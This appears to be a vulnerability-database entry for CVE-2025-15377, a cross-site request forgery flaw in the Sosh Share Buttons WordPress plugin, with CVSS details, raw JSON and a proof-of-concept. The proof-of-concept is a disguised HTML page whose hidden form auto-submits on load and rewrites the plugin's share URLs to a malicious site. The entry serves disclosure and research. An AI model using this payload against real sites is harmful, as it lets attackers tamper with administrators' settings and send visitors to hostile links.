Security Vulnerability Report
中文
CVE-2025-15377 CVSS 4.3 MEDIUM

CVE-2025-15377

Published: 2026-01-14 06:15:54
Last Modified: 2026-04-15 00:35:42

Description

The Sosh Share Buttons plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.0. This is due to missing nonce validation on the 'admin_page_content' function. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Sosh Share Buttons <= 1.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-15377 --> <!-- This PoC demonstrates how an attacker can trick a WordPress admin into updating Sosh Share Buttons settings --> <!DOCTYPE html> <html> <head> <title>CSRF Attack Demo</title> </head> <body> <h1>Check out this cool article!</h1> <p>Click the link below to read more:</p> <a href="http://target-site.com/interesting-article">Read More</a> <!-- Hidden CSRF form that auto-submits --> <form id="csrfForm" action="http://target-site.com/wp-admin/admin.php?page=sosh_share_buttons" method="POST" style="display:none;"> <!-- Plugin settings that will be modified --> <input type="hidden" name="sosh_facebook_enabled" value="1"> <input type="hidden" name="sosh_twitter_enabled" value="1"> <input type="hidden" name="sosh_facebook_url" value="https://malicious-site.com"> <input type="hidden" name="sosh_twitter_url" value="https://malicious-site.com"> <input type="hidden" name="sosh_save_settings" value="1"> <!-- Missing nonce field - this is the vulnerability --> </form> <script> // Auto-submit the form when page loads window.onload = function() { document.getElementById('csrfForm').submit(); // Redirect after form submission setTimeout(function() { window.location.href = 'http://target-site.com/interesting-article'; }, 1000); }; </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15377", "sourceIdentifier": "[email protected]", "published": "2026-01-14T06:15:54.283", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Sosh Share Buttons plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.0. This is due to missing nonce validation on the 'admin_page_content' function. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}, {"lang": "es", "value": "El plugin Sosh Share Buttons para WordPress es vulnerable a la falsificación de petición en sitios cruzados en todas las versiones hasta la 1.1.0, inclusive. Esto se debe a la falta de validación de nonce en la función 'admin_page_content'. Esto hace posible que atacantes no autenticados actualicen la configuración del plugin a través de una petición falsificada, siempre que puedan engañar a un administrador del sitio para que realice una acción como hacer clic en un enlace."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/sosh-share-buttons/tags/1.1.0/sosh.class.php#L138", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/38b8b563-10a4-4343-b95a-7d09cf6fd729?source=cve", "source": "[email protected]"}]}}